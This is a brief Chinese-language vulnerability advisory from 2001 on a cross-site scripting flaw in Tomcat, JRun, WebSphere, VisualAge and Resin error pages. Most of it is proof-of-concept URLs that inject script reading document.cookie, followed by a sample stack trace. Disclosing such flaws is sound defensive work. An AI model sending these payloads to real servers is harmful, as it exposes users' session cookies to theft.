多种Java Servlet 平台包含Cross-site脚本漏洞发布时间:2001-07-03 更新时间:2001-07-03 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 Tomcat 3.2.1, 3.2.2-beta, 4.0-beta详细描述 通过请求如下URL,脚本代码将在浏览器上执行: Tomcat 3.2.1: http://Tomcat/jsp-mapped-dir/>alert(document.cookie)</SCRIPT>.jsp JRun 3.0: http://JRun/>alert(document.cookie)</SCRIPT>.shtml http://JRun/>alert(document.cookie)</SCRIPT>.jsp http://JRun/>alert(document.cookie)</SCRIPT>.thtml WebSphere 3.5 FP2: http://WebSphere/webapp/examples/>alert(document.cookie)</SCRIPT> WebSphere 3.02: http://WebSphere/>alert(document.cookie)</SCRIPT>.jsp VisualAge for Java 3.5 Professional: http://VisualAge-WebSphere-Test-Environment/>alert(document.cookie)</SCRIPT> Resin 1.2.2: http://Reisin/>alert(document.cookie)</SCRIPT>.jsp http://www.caucho.com/>document.write(document.cookie)</SCRIPT>.jsp These pages produce output like this: ================================================= Error 404 An error has occurred while processing request: http://WebSphere/webapp/examples/****** Message: File not found: //****** StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //****** at javax.servlet.ServletException.<init>(ServletException.java:107) at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31) at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20) at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97) ... ================================================= ******: The JavaScript code is executed here. 测试代码 见描述部分。 解决方案 尚无 相关信息 |
